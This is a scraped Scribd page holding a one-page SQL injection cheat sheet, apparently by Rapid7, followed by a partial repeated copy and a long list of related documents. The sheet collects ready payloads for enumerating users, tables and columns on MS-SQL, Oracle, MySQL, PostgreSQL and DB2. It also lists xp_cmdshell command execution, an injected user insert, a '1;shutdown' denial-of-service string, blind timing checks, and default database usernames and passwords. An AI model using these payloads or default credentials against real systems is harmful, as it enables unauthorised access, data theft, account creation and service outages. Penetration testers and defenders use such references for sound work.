0% found this document useful (0 votes)

466 views1 page

R7 SQL - Injection - Cheat - Sheet.v1 PDF

This document provides a cheat sheet of common SQL injection commands that can be used to discover information and attack backend databases. It lists commands to find the database version, users, tables, columns, database name, and running user for various databases like MS SQL, Oracle, MySQL, PostgreSQL, and IBM DB2. It also gives examples of SQL injection strings that can break query syntax or extend queries, and common techniques for injecting unions, running commands, loading files, and bypassing filters.

Uploaded by

Forense Orlando

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

466 views1 page

R7 SQL - Injection - Cheat - Sheet.v1 PDF

Uploaded by

Forense Orlando

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 1

SQL INJECTION CHEAT SHEET

www.rapid7.com

Common SQL Injection Commands for Backend Databases

MS-SQL
Grab version

@@version

Users

name FROM master..syslogins

SQL Injection Discovery

Tables

name FROM master..sysobjects WHERE xtype = U

Common SQL Injection Attack Strings

Database

name FROM master..sysdatabases;

Columns

name FROM syscolumns WHERE id = (SELECT id

FROM sysobjects WHERE name = <TABLENAME)
DB_NAME()

Query syntax breaking

Single Quote(), Double Quote()

Injection SQL comment

Hyphens (--), Hash(#), Comment(/*)

Extending/Appending queries

Semicolon (;)

Running User

Injecting/Bypassing filters

CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Oracle

Common SQL Injection Commands

Grab version

table v$version compare with Oracle%

Users

* from dba_users

Injecting Union

Union all select NULL (Multiple columns)

Tables

table_name from all_tables

Running Command

1;exec master..xp_cmdshell dir>C:\inetpub\wwwroot\dir.txt OR master.dbo.xp_cmdshell

Database

distinct owner from all_tables

Columns

column_name from all_tab_columns where table_

name=<TABLENAME>

Running User

user from dual

Loading Files

LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

Adding user

1; insert into users values(nto,nto123)

DoS

1;shutdown

Fetching Fields

select name from syscolumns where id =(select

id FROM sysobjects where name = target table
name) (Union can help)Co

Common Blind SQL Injection Commands

IBM DB2
Grab version

Versionnumber from sysibm.sysversions;

Users

user from sysibm.sysdummy1

Tables

name from sysibm.systables

Database

schemaname from syscat.schemata

Quick Check

AND 1=1, AND 1=0

Columns

name, tbname, coltype from sysibm.syscolumns

User Check

1+AND+USER_NAME()=dbo

Running User

user from sysibm.sysdummy1

Injecting Wait

1;waitfor+delay+0:0:10

MySQL

Check for sa

SELECT+ASCII(SUBSTRING((a.
loginame),1,1))+FROM+master..
sysprocesses+AS+a+WHERE+a.spid+=+@@
SPID)=115

Grab version

@@version

Users

* from mysql.user

Tables

table_schema,table_name FROM information_

schema.tables WHERE table_schema != mysql
AND table_schema != information_schema

Database

distinct(db) FROM mysql.db

Columns

table_schema, column_name FROM information_

schema.columns WHERE table_schema != mysql
AND table_schema != information_schema AND
table_name == <TABLENAME>

Running User

user()

Looping/Sleep

BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords
Oracle

scott/tiger, dbsnmp/dbsnmp

MySQL

mysql/<BLANK>, root/<BLANK>

PostgreSQL

postgres/<BLANK>

MS-SQL

sa/<BLANK>

DB2

db2admin/db2admin

PostgreSQL
Grab version

version()

Users

* from pg_user

Database

datname FROM pg_database

Running User

user;

R7 SQL - Injection - Cheat - Sheet.v1 PDF
No ratings yet
R7 SQL - Injection - Cheat - Sheet.v1 PDF
1 page
SQL Injection Commands Guide
No ratings yet
SQL Injection Commands Guide
1 page
MySQL SQL Injection Cheat Sheet
No ratings yet
MySQL SQL Injection Cheat Sheet
4 pages
MySQL SQL Injection Cheat Sheet
No ratings yet
MySQL SQL Injection Cheat Sheet
3 pages
SQL Injection Cheat Sheet - Netsparker
No ratings yet
SQL Injection Cheat Sheet - Netsparker
40 pages
Pentestmonkey: Mysql SQL Injection Cheat Sheet
No ratings yet
Pentestmonkey: Mysql SQL Injection Cheat Sheet
3 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
4 pages
SQL Injection Cheat Sheet
100% (1)
SQL Injection Cheat Sheet
18 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
8 pages
SQL Injection Cheat Sheet - Netsparker
No ratings yet
SQL Injection Cheat Sheet - Netsparker
21 pages
SQL Injection Cheat Sheet - Web Security Academy
No ratings yet
SQL Injection Cheat Sheet - Web Security Academy
4 pages
SQL Injection Cheat Sheet Guide
No ratings yet
SQL Injection Cheat Sheet Guide
18 pages
SQL Injection Tutorial
0% (1)
SQL Injection Tutorial
21 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
8 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
3 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
1 page
SQL Injection Guide for Security Pros
No ratings yet
SQL Injection Guide for Security Pros
21 pages
SQL Injection Cheat Sheet - Netsparker
No ratings yet
SQL Injection Cheat Sheet - Netsparker
31 pages
Quick Guide To SQL Injection Attacks and Defenses - English
No ratings yet
Quick Guide To SQL Injection Attacks and Defenses - English
31 pages
Operation N SQL Injection Cheat Sheet
No ratings yet
Operation N SQL Injection Cheat Sheet
15 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
18 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
16 pages
Nav1n0x Gitbook Io A Guide To Manually Hunting SQL Injection...
No ratings yet
Nav1n0x Gitbook Io A Guide To Manually Hunting SQL Injection...
29 pages
Oracle SQL Injection Exploits
No ratings yet
Oracle SQL Injection Exploits
19 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
7 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
SQL Injection Cheat Sheet, Document Version 1.4: Examples
No ratings yet
SQL Injection Cheat Sheet, Document Version 1.4: Examples
15 pages
SQL Injection: Berserkr
No ratings yet
SQL Injection: Berserkr
7 pages
Pentestmonkey
No ratings yet
Pentestmonkey
5 pages
SQL Injection Cheat Sheetfor The Exam
No ratings yet
SQL Injection Cheat Sheetfor The Exam
5 pages
MSSQL Injection Cheat Sheet
No ratings yet
MSSQL Injection Cheat Sheet
5 pages
Neolex Injection-Sql
No ratings yet
Neolex Injection-Sql
2 pages
Advanced SQL Injection
No ratings yet
Advanced SQL Injection
28 pages
Module - 7 SQL - Injection eWPTXv2 Notes
No ratings yet
Module - 7 SQL - Injection eWPTXv2 Notes
17 pages
SQL Injection Cheat Sheet - Web Security Academy
No ratings yet
SQL Injection Cheat Sheet - Web Security Academy
4 pages
SQL Injection Cheat Sheet - Web Security Academy
No ratings yet
SQL Injection Cheat Sheet - Web Security Academy
4 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
Advanced SQL Injection: Dmitry Evteev (Positive Technologies) Web Application Security Consortium (WASC) Contributor
No ratings yet
Advanced SQL Injection: Dmitry Evteev (Positive Technologies) Web Application Security Consortium (WASC) Contributor
62 pages
SQLi
No ratings yet
SQLi
32 pages
SQL Injection - Sqlmap
No ratings yet
SQL Injection - Sqlmap
11 pages
SQL Injection Presentation by Vivek Pancholi
No ratings yet
SQL Injection Presentation by Vivek Pancholi
13 pages
SQL Injection
No ratings yet
SQL Injection
8 pages
SQL Injection Guide for Beginners
No ratings yet
SQL Injection Guide for Beginners
11 pages
SQL Injection Tips for Developers
No ratings yet
SQL Injection Tips for Developers
5 pages
Other Parts Are Not So Well Formatted But Check Out by Yourself, Drafts, Notes and Stuff, Scroll Down and See
100% (3)
Other Parts Are Not So Well Formatted But Check Out by Yourself, Drafts, Notes and Stuff, Scroll Down and See
17 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
41 pages
Dsds
No ratings yet
Dsds
41 pages
Oracle SQL Injection Cheat Sheet
No ratings yet
Oracle SQL Injection Cheat Sheet
3 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
6 pages
Database Security for DBAs
100% (1)
Database Security for DBAs
52 pages
Breaking Down The 5 Most Common SQL Injection Threats
No ratings yet
Breaking Down The 5 Most Common SQL Injection Threats
27 pages
Web Tutor
No ratings yet
Web Tutor
17 pages
Oracle Security Insights 2014
No ratings yet
Oracle Security Insights 2014
76 pages
MSSQL Server Cheat Sheet For Security Engineers 1699719420
No ratings yet
MSSQL Server Cheat Sheet For Security Engineers 1699719420
17 pages
SQLMap Essentials
No ratings yet
SQLMap Essentials
55 pages
DoS Protection Settings Guide
No ratings yet
DoS Protection Settings Guide
11 pages
Magic Quadrant For Access Management: Strategic Planning Assumptions
No ratings yet
Magic Quadrant For Access Management: Strategic Planning Assumptions
40 pages
Fortitoken Mobile: One-Time Password Application With Push Notification
No ratings yet
Fortitoken Mobile: One-Time Password Application With Push Notification
3 pages
Market Guide For User Authentication: Key Findings
No ratings yet
Market Guide For User Authentication: Key Findings
51 pages
Proofpoint Indirect Partner Program Documents
No ratings yet
Proofpoint Indirect Partner Program Documents
22 pages
EMET 5.52 User Guide
No ratings yet
EMET 5.52 User Guide
40 pages
DS NetXplorer Rev10 A4 LR Publish
No ratings yet
DS NetXplorer Rev10 A4 LR Publish
4 pages
Demisto - Confessions of A SOC Engineer
No ratings yet
Demisto - Confessions of A SOC Engineer
34 pages
Talkdesk For Zendesk Datasheet 02
No ratings yet
Talkdesk For Zendesk Datasheet 02
1 page
Microsoft 365 - Selling Security and Compliance Scenarios
No ratings yet
Microsoft 365 - Selling Security and Compliance Scenarios
31 pages
Dio CH54754 - FR - How To Install
No ratings yet
Dio CH54754 - FR - How To Install
5 pages
Forensic UltraDock v5 User Manual
No ratings yet
Forensic UltraDock v5 User Manual
4 pages
Allot 07-EN - DS - NetXplorer - en
No ratings yet
Allot 07-EN - DS - NetXplorer - en
4 pages
SCYTHE Purple Team Exercise Framework
100% (1)
SCYTHE Purple Team Exercise Framework
19 pages
Fortigate Fortiwifi 80F Series: Data Sheet
No ratings yet
Fortigate Fortiwifi 80F Series: Data Sheet
9 pages
Guide To SIEM
No ratings yet
Guide To SIEM
13 pages
The Soc Hiring Handbook
No ratings yet
The Soc Hiring Handbook
28 pages
Fortigate 80F Datasheet
No ratings yet
Fortigate 80F Datasheet
7 pages
SPD 2018 O.1.2.3 - Annual Incident Reports 2017
No ratings yet
SPD 2018 O.1.2.3 - Annual Incident Reports 2017
17 pages

R7 SQL - Injection - Cheat - Sheet.v1 PDF

Uploaded by

R7 SQL - Injection - Cheat - Sheet.v1 PDF

Uploaded by

SQL INJECTION CHEAT SHEET

Common SQL Injection Commands for Backend Databases

name FROM master..syslogins

SQL Injection Discovery

name FROM master..sysobjects WHERE xtype = U

Common SQL Injection Attack Strings

name FROM master..sysdatabases;

name FROM syscolumns WHERE id = (SELECT id

Query syntax breaking

Single Quote(), Double Quote()

Injection SQL comment

Hyphens (--), Hash(#), Comment(/*)

CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Common SQL Injection Commands

table v$version compare with Oracle%

Union all select NULL (Multiple columns)

table_name from all_tables

1;exec master..xp_cmdshell dir>C:\inetpub\wwwroot\dir.txt OR master.dbo.xp_cmdshell

distinct owner from all_tables

column_name from all_tab_columns where table_

user from dual

LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

1; insert into users values(nto,nto123)

select name from syscolumns where id =(select

Common Blind SQL Injection Commands

Versionnumber from sysibm.sysversions;

user from sysibm.sysdummy1

name from sysibm.systables

schemaname from syscat.schemata

AND 1=1, AND 1=0

name, tbname, coltype from sysibm.syscolumns

user from sysibm.sysdummy1

table_schema,table_name FROM information_

distinct(db) FROM mysql.db

table_schema, column_name FROM information_

BENCHMARK(TIMES, TASK), pg_sleep(10)

datname FROM pg_database

You might also like